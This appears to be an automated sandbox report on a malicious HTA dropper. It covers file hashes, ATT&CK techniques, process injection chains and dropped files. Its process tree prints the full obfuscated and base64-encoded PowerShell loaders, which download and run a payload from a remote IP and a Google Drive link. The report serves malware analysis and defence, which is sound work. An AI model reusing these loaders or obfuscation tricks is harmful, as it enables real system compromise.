e17ace1660b239f015e6886e188002d6aa210c25723e4fe4e7252b185ef98931

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07/11/2024, 03:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e17ace1660b239f015e6886e188002d6aa210c25723e4fe4e7252b185ef98931.hta
Size

206KB
MD5

a67cc7c8b7c0047d1bee23eb85b041c6
SHA1

ff5141beb7b39c95c6ac9934e26a17603ac4309f
SHA256

e17ace1660b239f015e6886e188002d6aa210c25723e4fe4e7252b185ef98931
SHA512

38c06a12ace2b347c90fc52f20bc0a84c037a9c711084348a2122686ad122f64117249535ce797e6c6cf1e554b1b397382d187baef53ef5e0a2d028c8e6bed91
SSDEEP

96:43F97ZkK7E5lKFE5qbZIgrHlcARlNRoyX1K+K9nE5nKLQ:43F1ZNA5sm5DgryAvoyMby5KLQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 35 IoCs

flow	pid	Process
16	1224	pOWErSHElL.eXE
19	932	powershell.exe
24	932	powershell.exe
28	932	powershell.exe
43	4876	mshta.exe
46	4876	mshta.exe
50	4876	mshta.exe
52	4876	mshta.exe
53	4876	mshta.exe
54	4876	mshta.exe
56	4876	mshta.exe
60	4876	mshta.exe
62	4876	mshta.exe
63	4876	mshta.exe
64	4876	mshta.exe
68	4876	mshta.exe
70	4876	mshta.exe
71	4876	mshta.exe
72	4876	mshta.exe
73	4876	mshta.exe
75	4876	mshta.exe
77	4876	mshta.exe
78	4876	mshta.exe
79	4876	mshta.exe
80	4876	mshta.exe
82	4876	mshta.exe
83	4876	mshta.exe
84	4876	mshta.exe
85	4876	mshta.exe
86	4876	mshta.exe
88	4876	mshta.exe
90	4876	mshta.exe
91	4876	mshta.exe
92	4876	mshta.exe
93	4876	mshta.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3584	powershell.exe
932	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1224	pOWErSHElL.eXE
1632	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
18	drive.google.com
19	drive.google.com

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 932 set thread context of 4368	932	powershell.exe	108
PID 4368 set thread context of 4876	4368	aspnet_regbrowsers.exe	84
PID 4368 set thread context of 4048	4368	aspnet_regbrowsers.exe	109
PID 4048 set thread context of 4876	4048	cleanmgr.exe	84
PID 4048 set thread context of 400	4048	cleanmgr.exe	114

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cleanmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOWErSHElL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	cleanmgr.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	pOWErSHElL.eXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
1224	pOWErSHElL.eXE
1224	pOWErSHElL.eXE
1632	powershell.exe
1632	powershell.exe
3584	powershell.exe
3584	powershell.exe
932	powershell.exe
932	powershell.exe
4368	aspnet_regbrowsers.exe
4368	aspnet_regbrowsers.exe
4368	aspnet_regbrowsers.exe
4368	aspnet_regbrowsers.exe
4368	aspnet_regbrowsers.exe
4368	aspnet_regbrowsers.exe
4368	aspnet_regbrowsers.exe
4368	aspnet_regbrowsers.exe
4048	cleanmgr.exe
4048	cleanmgr.exe
4048	cleanmgr.exe
4048	cleanmgr.exe
4048	cleanmgr.exe
4048	cleanmgr.exe
4048	cleanmgr.exe
4048	cleanmgr.exe

Suspicious behavior: MapViewOfSection 7 IoCs

pid	Process
4368	aspnet_regbrowsers.exe
4876	mshta.exe
4876	mshta.exe
4048	cleanmgr.exe
4048	cleanmgr.exe
4048	cleanmgr.exe
4048	cleanmgr.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1224	pOWErSHElL.eXE
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 4876 wrote to memory of 1224	4876	mshta.exe	88
PID 4876 wrote to memory of 1224	4876	mshta.exe	88
PID 4876 wrote to memory of 1224	4876	mshta.exe	88
PID 1224 wrote to memory of 1632	1224	pOWErSHElL.eXE	90
PID 1224 wrote to memory of 1632	1224	pOWErSHElL.eXE	90
PID 1224 wrote to memory of 1632	1224	pOWErSHElL.eXE	90
PID 1224 wrote to memory of 3288	1224	pOWErSHElL.eXE	95
PID 1224 wrote to memory of 3288	1224	pOWErSHElL.eXE	95
PID 1224 wrote to memory of 3288	1224	pOWErSHElL.eXE	95
PID 3288 wrote to memory of 1856	3288	csc.exe	97
PID 3288 wrote to memory of 1856	3288	csc.exe	97
PID 3288 wrote to memory of 1856	3288	csc.exe	97
PID 1224 wrote to memory of 4556	1224	pOWErSHElL.eXE	100
PID 1224 wrote to memory of 4556	1224	pOWErSHElL.eXE	100
PID 1224 wrote to memory of 4556	1224	pOWErSHElL.eXE	100
PID 4556 wrote to memory of 3584	4556	WScript.exe	101
PID 4556 wrote to memory of 3584	4556	WScript.exe	101
PID 4556 wrote to memory of 3584	4556	WScript.exe	101
PID 3584 wrote to memory of 932	3584	powershell.exe	103
PID 3584 wrote to memory of 932	3584	powershell.exe	103
PID 3584 wrote to memory of 932	3584	powershell.exe	103
PID 932 wrote to memory of 4368	932	powershell.exe	108
PID 932 wrote to memory of 4368	932	powershell.exe	108
PID 932 wrote to memory of 4368	932	powershell.exe	108
PID 932 wrote to memory of 4368	932	powershell.exe	108
PID 932 wrote to memory of 4368	932	powershell.exe	108
PID 932 wrote to memory of 4368	932	powershell.exe	108
PID 4876 wrote to memory of 4048	4876	mshta.exe	109
PID 4876 wrote to memory of 4048	4876	mshta.exe	109
PID 4876 wrote to memory of 4048	4876	mshta.exe	109
PID 4048 wrote to memory of 400	4048	cleanmgr.exe	114
PID 4048 wrote to memory of 400	4048	cleanmgr.exe	114

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e17ace1660b239f015e6886e188002d6aa210c25723e4fe4e7252b185ef98931.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4876
- C:\Windows\SysWOW64\WiNDoWSpowERshElL\V1.0\pOWErSHElL.eXE
  "C:\Windows\SystEM32\WiNDoWSpowERshElL\V1.0\pOWErSHElL.eXE" "PowersheLl -EX byPaSS -nOP -W 1 -C DevIceCREDENtiALdEpLOYMENt.exE ; IEX($(iEX('[sysTem.tExT.encOdIng]'+[chAr]58+[chAr]58+'Utf8.GEtSTrinG([SYsTEM.CoNveRT]'+[ChaR]0X3A+[CHAR]0X3A+'FroMbase64sTriNG('+[cHAr]34+'JHhTejB4TmxHaWk2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFUmRFRkluSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTW9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdraXR5bWpubixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0QWxZenN4cSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZm1BcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcHQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXBxeHVFdkFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZmT3hnV2pUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhb1R3RkxYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4U3oweE5sR2lpNjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNjEuMTMwLzExMi9zZWV0aGViZXN0dGhpbmdzdG9nZXRtZXdpdGhncmVhdHRoaW5nc29uaGVyZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3RvZ2V0bWV3aXRoZ3JlYXR0aGluZ3Nvbi52YnMiLDAsMCk7c1RhUlQtc2xlZXAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N0b2dldG1ld2l0aGdyZWF0dGhpbmdzb24udmJzIg=='+[chAr]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1224
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPaSS -nOP -W 1 -C DevIceCREDENtiALdEpLOYMENt.exE
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5qyav0rl\5qyav0rl.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3288
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC93B.tmp" "c:\Users\Admin\AppData\Local\Temp\5qyav0rl\CSCFA569F0843CB4F51BF356FC66C2EBF3D.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1856
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingstogetmewithgreatthingson.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIZWxsSURbMV0rJHNIRWxMaURbMTNdKydYJykgKCAoJ3QwM2ltYWdlVXJsID0gVWZsaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVXlIcXdyblhDbEtCJysnSjNqNjNMbDF0MlN0VmdHeGJTdDAgVWZsO3QwM3dlYicrJ0NsaWVudCAnKyc9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQnKyc7dDAzaW1hZ2VCeXRlcyA9IHQwM3dlYkNsaWVudC5Eb3dubG9hZERhdGEodDAzaW1hZ2VVcmwpO3QwM2ltYWdlVGV4dCA9ICcrJ1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKHQwM2ltYWdlQnl0ZXMpO3QwM3N0YXJ0RmxhZyA9IFVmbDw8QkFTRTY0X1NUQVJUPj5VZmw7dDAzZW5kRmxhZyA9IFVmbDw8QkFTRTY0X0VORD4+VWZsO3QwM3N0YXJ0SW5kZXggPSB0MDNpbWFnZVRleHQuSW5kZXhPZih0MDNzdGFydEZsJysnYWcpO3QwM2VuZEluZGV4ID0gdDAzaW1hZ2VUZXh0LicrJ0luZGV4T2YodDAzZW5kRmxhZyk7dDAzc3RhcnRJbmRleCAtZ2UgMCAtYW5kJysnIHQwM2VuZEluZGV4JysnIC1ndCB0MDNzdGFydEluZGV4O3QwM3N0YXJ0JysnSW5kZXggKz0gdDAzc3RhcnRGbGFnJysnLkxlbmd0aDt0MDNiYXNlNjRMZW5ndGggPScrJyB0MDNlbmRJbmRleCAtIHQwM3N0YXJ0SW5kZXg7dDAzYmFzZTY0QycrJ29tbWFuZCA9IHQwM2ltYWdlVGV4dC5TdWJzJysndHInKydpbmcodDAzc3RhcnRJbmRleCwgdDAzYmFzZTY0TGVuJysnZ3RoKTt0MDNiYScrJ3NlNjRSZXZlcnNlZCA9IC1qb2luICh0MDNiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgSFpWIEZvckVhY2gtT2JqZWN0IHsgdDAzXyB9KVstMS4uLSh0MDNiYXNlNjRDb21tYW5kLkxlbmd0aCldO3QwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcodDAzYmFzZTY0UmV2ZXJzZWQpO3QnKycwM2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh0MDNjb21tYW5kQnl0ZXMpO3QwM3ZhaU1ldGhvZCA9IFtkbmxpYi5JTycrJy5Ib21lXS5HZXRNZXRob2QoVWZsVkFJVWZsKTt0MDN2YWlNZXRob2QuSW52b2tlKHQwM251bGwsIEAoVWZsJysndHh0LkdGU1NXWi8yMTEvMDMxLjE2LjI3MS43MDEvLzpwdHRoVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxkZXNhdGl2YWRvVWZsLCBVZmxhc3BuZXRfcmVnYnJvd3NlcnNVZmwsIFVmbGRlc2F0aXZhZG9VZmwsIFVmbGRlc2F0aXZhZG9VZmwsVWZsZGUnKydzYXRpdmFkb1VmbCxVZmxkZXNhdGl2YWRvVWZsLFVmbGRlc2F0aXYnKydhZG9VZicrJ2wsVWZsZGVzYXRpdmFkb1VmbCxVZmxkZXNhdGl2YWQnKydvVWZsLFVmbDFVZmwsVWZsZGVzYXRpdmFkb1VmbCkpOycpLlJFcExhY0UoKFtjSGFSXTcyK1tjSGFSXTkwK1tjSGFSXTg2KSxbc1RSSU5HXVtjSGFSXTEyNCkuUkVwTGFjRSgnVWZsJyxbc1RSSU5HXVtjSGFSXTM5KS5SRXBMYWNFKCd0MDMnLFtzVFJJTkddW2NIYVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHellID[1]+$sHElLiD[13]+'X') ( ('t03imageUrl = Uflhttps://drive.google.com/uc?export=download&id=1UyHqwrnXClKB'+'J3j63Ll1t2StVgGxbSt0 Ufl;t03web'+'Client '+'= New-Object System.Net.WebClient'+';t03imageBytes = t03webClient.DownloadData(t03imageUrl);t03imageText = '+'[System.Text.Encoding]::UTF8.GetString'+'(t03imageBytes);t03startFlag = Ufl<<BASE64_START>>Ufl;t03endFlag = Ufl<<BASE64_END>>Ufl;t03startIndex = t03imageText.IndexOf(t03startFl'+'ag);t03endIndex = t03imageText.'+'IndexOf(t03endFlag);t03startIndex -ge 0 -and'+' t03endIndex'+' -gt t03startIndex;t03start'+'Index += t03startFlag'+'.Length;t03base64Length ='+' t03endIndex - t03startIndex;t03base64C'+'ommand = t03imageText.Subs'+'tr'+'ing(t03startIndex, t03base64Len'+'gth);t03ba'+'se64Reversed = -join (t03base64Command.ToCharArray() HZV ForEach-Object { t03_ })[-1..-(t03base64Command.Length)];t03commandBytes = [System.Convert]::FromBase64String(t03base64Reversed);t'+'03loadedAssembly = [System.Reflection.Assembly]::Load(t03commandBytes);t03vaiMethod = [dnlib.IO'+'.Home].GetMethod(UflVAIUfl);t03vaiMethod.Invoke(t03null, @(Ufl'+'txt.GFSSWZ/211/031.16.271.701//:ptthUfl, UfldesativadoUfl, UfldesativadoUfl, UfldesativadoUfl, Uflaspnet_regbrowsersUfl, UfldesativadoUfl, UfldesativadoUfl,Uflde'+'sativadoUfl,UfldesativadoUfl,Ufldesativ'+'adoUf'+'l,UfldesativadoUfl,Ufldesativad'+'oUfl,Ufl1Ufl,UfldesativadoUfl));').REpLacE(([cHaR]72+[cHaR]90+[cHaR]86),[sTRING][cHaR]124).REpLacE('Ufl',[sTRING][cHaR]39).REpLacE('t03',[sTRING][cHaR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:932
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:4368
- C:\Windows\SysWOW64\cleanmgr.exe
  "C:\Windows\SysWOW64\cleanmgr.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:4048
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWErSHElL.eXE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
13f137a0e0fa08b17eebf2af46de4e7f

SHA1
0072958fcaae670b74be42a07629f8b3a2d4db1f

SHA256
55d139ac5e08097aea59b886b574b63031afdad9fd3a4345724ebd4edd2a8ab6

SHA512
4eab29fb777c71932497057c1d0b1984bc753ed47724f6b58991d791dfbbedc9f6515c7399c95245f7e77dfbfc11e52dcfd94a424e91f2d0993307c2e69a4bbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4271c0c566ad74df02b2954bc6b94ebf

SHA1
c0ffffa48f586e7f44c89f24e341c96baec22ea0

SHA256
ada15753d699260c673fc6e4cedd4eea74c794b75a6665d18f4c3c4e27f9aaef

SHA512
b15743b40e721a1fdd30d70b54f71815b05bad809f2bdfb0712f695130e54c2bcb587b6241334386843a2002330809c149cf6d64dd5eca365bb93e349375d121

Download Submit
C:\Users\Admin\AppData\Local\Temp\5qyav0rl\5qyav0rl.dll

Filesize
3KB

MD5
294347c09670cc41459b830c335792d1

SHA1
215fb4430c08121c0e9ac12b57fbaa83e30f0aaa

SHA256
cb7d2f7905e89a20db890fc1483148e5c0d9e7649b48a55b878359150d377191

SHA512
ef604fb373f66a17a4c861dadebff76aece9a57fd2a84faa5f82f61dce36cd65d967b92160488ecefb68051ee358b8ea616df6640c288b52fc2984c54bb06945

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC93B.tmp

Filesize
1KB

MD5
ffad3b84ae3a399d95d3dbae46d9fe6b

SHA1
f109ffc4df59590a4b2cebf98e5896f6890230f2

SHA256
9915fe955e9642930ea14e858adc4d66bad31c388da2c61df9b17246e067c0ef

SHA512
b66a9a93a72ae5455b624aed7ef3aeed18b5dc55839667f1a1d707e8be1f7cec343b05301f2d7d60dcfa64d311de5c1a71768c306e80122383258a64c53ad11c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_myrnfpee.npw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingstogetmewithgreatthingson.vbs

Filesize
138KB

MD5
494642e2a61a8b0e6bc9ebf07f58aa62

SHA1
d7975e4dc0bedd03fbba1390e3e75bfd5f4c725c

SHA256
ebe70ca2f1c620ca9e3615c0a69e3bf5fffeb3f9f8ba6672eab20c9e952ad311

SHA512
ea79a010e1d7820cc7513c26614be8fc0b3d322055035815458b608be08e4bea293983c68c85a7f6746272d0ba86d45caa66e8d5318d78e8d565bd42a27c1aae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5qyav0rl\5qyav0rl.0.cs

Filesize
486B

MD5
af0e0993b960e9bba00f8a8f483423d8

SHA1
45f4d42e16df29c262a7e626cdad0281f19b99e9

SHA256
2d5ac3d6056b2457bb1605d4bf44784ef1a51fb02ef49b5b384cd1c011255b0f

SHA512
47e60eaf671bd7edf358d65416c2ca04b766f20e2ae733fc75720244d7a0366914e187142fa07cce86202497435cfec6bc573c4ede7d5cb00472d7ba33964919

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5qyav0rl\5qyav0rl.cmdline

Filesize
369B

MD5
bdc03bde87186da87ac0cb0b660ee892

SHA1
77a785c385edfc3602e340900b9e8fe2734f16f4

SHA256
c4965b6dacc5eabf1341bd74c17687fb44484bcab43ee156346fc6e0fc06692a

SHA512
dc0a3e99d40790e460189f9753b1291c3773a4d206289c72d484fddce244572861d5db801f526d4aafec17aeb129ac8825e34a324adb7c1824dc0b49a14cd533

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5qyav0rl\CSCFA569F0843CB4F51BF356FC66C2EBF3D.TMP

Filesize
652B

MD5
858b9d5ac16d7528c74e7fb7d9649860

SHA1
fc98d89b7e1a479a4df0df28b553791bb907aa82

SHA256
74e75de9aa0a1c72e3b5b5b430451d512c3e60608ab9471e1d8633e1eb43d4ed

SHA512
135b720d108f2e8bcf25960059bf170b066e2e467aa6d14e0d41f8da9c7f106c81a7380cb8e04daada04a8360e5ae394ae36900d894d6711d5939a4bbe66157d

Download Submit
memory/400-117-0x0000024C551D0000-0x0000024C552D1000-memory.dmp

Filesize
1.0MB

Download
memory/932-102-0x0000000007E20000-0x0000000007F78000-memory.dmp

Filesize
1.3MB

Download
memory/932-103-0x0000000007F80000-0x000000000801C000-memory.dmp

Filesize
624KB

Download
memory/1224-4-0x0000000071780000-0x0000000071F30000-memory.dmp

Filesize
7.7MB

Download
memory/1224-18-0x0000000005C00000-0x0000000005C1E000-memory.dmp

Filesize
120KB

Download
memory/1224-0-0x000000007178E000-0x000000007178F000-memory.dmp

Filesize
4KB

Download
memory/1224-19-0x0000000005C30000-0x0000000005C7C000-memory.dmp

Filesize
304KB

Download
memory/1224-81-0x0000000071780000-0x0000000071F30000-memory.dmp

Filesize
7.7MB

Download
memory/1224-7-0x0000000005630000-0x0000000005696000-memory.dmp

Filesize
408KB

Download
memory/1224-3-0x0000000004E20000-0x0000000005448000-memory.dmp

Filesize
6.2MB

Download
memory/1224-76-0x0000000071780000-0x0000000071F30000-memory.dmp

Filesize
7.7MB

Download
memory/1224-73-0x000000007178E000-0x000000007178F000-memory.dmp

Filesize
4KB

Download
memory/1224-5-0x0000000004CA0000-0x0000000004CC2000-memory.dmp

Filesize
136KB

Download
memory/1224-72-0x0000000008170000-0x0000000008714000-memory.dmp

Filesize
5.6MB

Download
memory/1224-71-0x0000000006FC0000-0x0000000006FE2000-memory.dmp

Filesize
136KB

Download
memory/1224-17-0x00000000056A0000-0x00000000059F4000-memory.dmp

Filesize
3.3MB

Download
memory/1224-6-0x0000000005550000-0x00000000055B6000-memory.dmp

Filesize
408KB

Download
memory/1224-65-0x00000000061A0000-0x00000000061A8000-memory.dmp

Filesize
32KB

Download
memory/1224-2-0x0000000071780000-0x0000000071F30000-memory.dmp

Filesize
7.7MB

Download
memory/1224-1-0x00000000022C0000-0x00000000022F6000-memory.dmp

Filesize
216KB

Download
memory/1632-29-0x0000000007720000-0x0000000007752000-memory.dmp

Filesize
200KB

Download
memory/1632-40-0x0000000007700000-0x000000000771E000-memory.dmp

Filesize
120KB

Download
memory/1632-49-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

Filesize
104KB

Download
memory/1632-48-0x0000000007AE0000-0x0000000007AF4000-memory.dmp

Filesize
80KB

Download
memory/1632-47-0x0000000007AD0000-0x0000000007ADE000-memory.dmp

Filesize
56KB

Download
memory/1632-46-0x0000000007AA0000-0x0000000007AB1000-memory.dmp

Filesize
68KB

Download
memory/1632-45-0x0000000007B30000-0x0000000007BC6000-memory.dmp

Filesize
600KB

Download
memory/1632-44-0x0000000007900000-0x000000000790A000-memory.dmp

Filesize
40KB

Download
memory/1632-43-0x00000000078A0000-0x00000000078BA000-memory.dmp

Filesize
104KB

Download
memory/1632-30-0x000000006E040000-0x000000006E08C000-memory.dmp

Filesize
304KB

Download
memory/1632-42-0x0000000007EE0000-0x000000000855A000-memory.dmp

Filesize
6.5MB

Download
memory/1632-41-0x0000000007760000-0x0000000007803000-memory.dmp

Filesize
652KB

Download
memory/1632-50-0x0000000007B20000-0x0000000007B28000-memory.dmp

Filesize
32KB

Download
